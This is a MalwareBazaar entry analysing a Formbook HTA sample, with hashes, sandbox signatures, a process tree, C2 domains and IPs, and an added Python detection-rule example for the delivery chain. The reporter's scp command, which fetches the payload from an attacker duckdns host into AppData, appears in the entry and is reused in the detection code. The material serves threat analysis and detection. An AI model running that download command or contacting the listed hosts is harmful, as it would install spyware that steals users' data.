MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Formbook
Vendor detections: 11

SHA256 hash: 59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8
SHA3-384 hash: d22df54a7eee16ed1041a8d30662578aafb02df8997d3f63827d0e9b012baca6dd65617c90ed69f1b93afcdae7c75fdb
SHA1 hash: 2482ade149122a56ece9aeb171f2296a958f4083
MD5 hash: e60881345186f019350a2971642549f4
humanhash: fillet-india-white-indigo
File name: DypP.hta
Signature: Formbook
File size: 49'661 bytes
First seen: 2023-08-09 14:55:43 UTC
Last seen: Never
File type: HTML Application (hta)
MIME type: text/html
ssdeep: 768:3h9O2+94AQEdQzzZ3ZtBQl4+mVBz/z0hY:3h9O2XAAZbS4+mDz/z0G
TLSH: T11F23A48D7C8539B0394A5CB5991F4CBD2970A9266A9A83F81610E7D05CF2CDEBBD3C4C
Reporter: TomU
Tags: FormBook hta lnk SCP


TomU
34a5deb851f292c65c8a1a64b938ca5a Request_for_Quotation.zip
5483f87473dc372d55856bd4f39a63f0 Request_for_Quotation.lnk

scp -o StrictHostKeyChecking=no cd@htaturnerforlifeboyyy.duckdns.org:/cd/AajQ C:\Users\user\AppData\Roaming\DypP.hta

e60881345186f019350a2971642549f4 DypP.hta
59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8 DypP.hta

Intelligence


File Origin
# of uploads: 1
# of downloads: 125
Origin country: CH
Vendor Threat Intelligence
Result
Verdict: Malicious
File Type: HTA File - Malicious
Behaviour
BlacklistAPI detected
Result
Verdict: MALICIOUS
Result
Threat name: FormBook
Detection: malicious
Classification: troj.evad
Score: 100 / 100
Signature
Adds a directory exclusion to Windows Defender
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Found malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Suspicious powershell command line found
System process connects to network (likely due to code injection or exploit)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected FormBook
Behaviour
Behavior Graph (ID 1288664; sample DypP.hta; start date 09/08/2023, i.e. 9 August 2023; architecture WINDOWS; score 100)

Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

Process tree, with dropped files, network destinations and per-process signatures. There are two entry points: the submitted HTA (mshta.exe) and the persisted copy NRGdELGVSZiWc.exe.

mshta.exe
  signature: Suspicious powershell command line found
  powershell.exe
    network: 179.43.175.187 tcp/80 (source port 49697), ASN PLI-AS (CH), geolocated Panama
    dropped: C:\Users\user\AppData\Roaming\TEST.exe (PE32)
    signature: Powershell drops PE file
    conhost.exe
    TEST.exe
      dropped: C:\Users\user\AppData\...\NRGdELGVSZiWc.exe (PE32)
      dropped: C:\Users\user\AppData\Local\...\tmp54D5.tmp (XML)
      signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
      powershell.exe
        conhost.exe
      schtasks.exe
        conhost.exe
      TEST.exe
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
          signature: System process connects to network (likely due to code injection or exploit)
          network: riverlatte.com 192.254.187.94 tcp/80 (source port 49698), ASN UNIFIEDLAYER-AS-1 (US), geolocated United States
          network: www.10510ydx.click 43.154.67.170 tcp/80 (source ports 49700, 49701), ASN LILLY-AS (US), geolocated Japan
          network: 3 other IPs or domains
          cmmon32.exe
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            cmd.exe
              conhost.exe
          raserver.exe

NRGdELGVSZiWc.exe
  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  NRGdELGVSZiWc.exe
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
  schtasks.exe
    conhost.exe
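The reporter's comment and the sandbox behaviour above describe one delivery chain: an LNK inside a ZIP runs scp.exe (with StrictHostKeyChecking=no) to pull DypP.hta into %APPDATA%\Roaming, mshta.exe runs it, a powershell.exe child downloads and drops TEST.exe, and schtasks.exe registers persistence from a .tmp XML in Local\Temp. The following is an added example of endpoint detection logic for that chain, written for this page; it is not MalwareBazaar code and not part of the reporter's submission. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage). The scp command line is the one the reporter posted; every other command line, path, parent process and task name in the sample events is constructed, and the assumption that the task was created with schtasks /Create /XML is inferred from the "Scheduled temp file as task from temp location" Sigma hit, not shown on the page.

```python
"""Process-creation triage for the DypP.hta delivery chain (added example).

Encodes the chain visible on the MalwareBazaar page as four rules and runs
them over constructed Sysmon-style process-creation events. Not MalwareBazaar
code; the scp command line is the reporter's, everything else is constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process (Sysmon Image)
    command_line: str   # Sysmon CommandLine
    parent_image: str   # Sysmon ParentImage


# Any path under a user's AppData tree (Roaming, Local, Local\Temp, ...).
USER_APPDATA = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_scp_hta_pull(ev: ProcEvent) -> bool:
    """T1105: scp.exe fetching an .hta into AppData with host-key checking off.
    StrictHostKeyChecking=no alone is common in automation, so the rule also
    requires the AppData destination and the .hta extension."""
    cl = ev.command_line
    return (_base(ev.image) == "scp.exe"
            and "StrictHostKeyChecking=no" in cl
            and USER_APPDATA.search(cl) is not None
            and cl.rstrip().lower().endswith(".hta"))


def rule_mshta_from_appdata(ev: ProcEvent) -> bool:
    """T1218.005: mshta.exe executing an .hta from a user-writable AppData path."""
    cl = ev.command_line
    return (_base(ev.image) == "mshta.exe"
            and USER_APPDATA.search(cl) is not None
            and ".hta" in cl.lower())


def rule_powershell_child_of_mshta(ev: ProcEvent) -> bool:
    """T1059.001: powershell.exe spawned by mshta.exe (the stage-two downloader)."""
    return (_base(ev.image) == "powershell.exe"
            and _base(ev.parent_image) == "mshta.exe")


def rule_schtasks_xml_from_temp(ev: ProcEvent) -> bool:
    """T1053.005: schtasks.exe /Create reading its task XML from a Temp .tmp file
    (the sandbox dropped tmp54D5.tmp, XML; the /XML form is an assumption)."""
    cl = ev.command_line.lower()
    return (_base(ev.image) == "schtasks.exe"
            and "/create" in cl and "/xml" in cl
            and re.search(r"\\appdata\\local\\temp\\[^\\\s]+\.tmp", cl) is not None)


RULES = {
    "scp_hta_pull": rule_scp_hta_pull,
    "mshta_from_appdata": rule_mshta_from_appdata,
    "powershell_child_of_mshta": rule_powershell_child_of_mshta,
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
}


def triage(events):
    """Return (rule name, process name) for every rule hit, in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, _base(ev.image)))
    return hits


# Constructed events: the scp command line is the reporter's; parents, paths,
# task name and the other command lines are assumptions for this example.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\OpenSSH\scp.exe",
              r"scp -o StrictHostKeyChecking=no cd@htaturnerforlifeboyyy.duckdns.org:/cd/AajQ "
              r"C:\Users\user\AppData\Roaming\DypP.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\user\AppData\Roaming\DypP.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "<constructed stage-two downloader>"',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Updates\NRGdELGVSZiWc" /XML "C:\Users\user\AppData\Local\Temp\tmp54D5.tmp"',
              r"C:\Users\user\AppData\Roaming\TEST.exe"),
    # Benign look-alikes that must not fire (no AppData path, no .hta target):
    ProcEvent(r"C:\Windows\System32\OpenSSH\scp.exe",
              r"scp -o StrictHostKeyChecking=no C:\Users\user\Documents\backup.tar.gz ops@backup.example.internal:/backups/",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\Help\index.hta"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, proc in triage(SAMPLE_EVENTS):
        print(f"{name:28s} {proc}")
```

Each rule deliberately combines two or three weak indicators rather than alerting on one: scp.exe with host-key checking disabled, or mshta.exe on its own, is noisy in most estates, but scp.exe writing an .hta into AppData, mshta.exe running from AppData, powershell.exe parented by mshta.exe, and schtasks.exe importing a task from a Temp .tmp file are each rare enough to page on, and together they reproduce the process tree the sandbox recorded for this sample.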
Threat name: Script-WScript.Trojan.Htaload
Status: Suspicious
First seen: 2023-08-09 14:56:06 UTC
File Type: Text (VBS)
AV detection: 8 of 38 (21.05%)
Threat level: 5/5
Result
Malware family: formbook
Score: 10/10
Tags: family:formbook campaign:oi24 rat spyware stealer trojan
Behaviour
Creates scheduled task(s)
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of SetThreadContext
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Formbook payload
Formbook
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name:QbotStuff
Author:anonymous

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam
  Formbook
    HTML Application (hta) 59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8 (this sample)

Delivery method: Distributed via e-mail attachment

Comments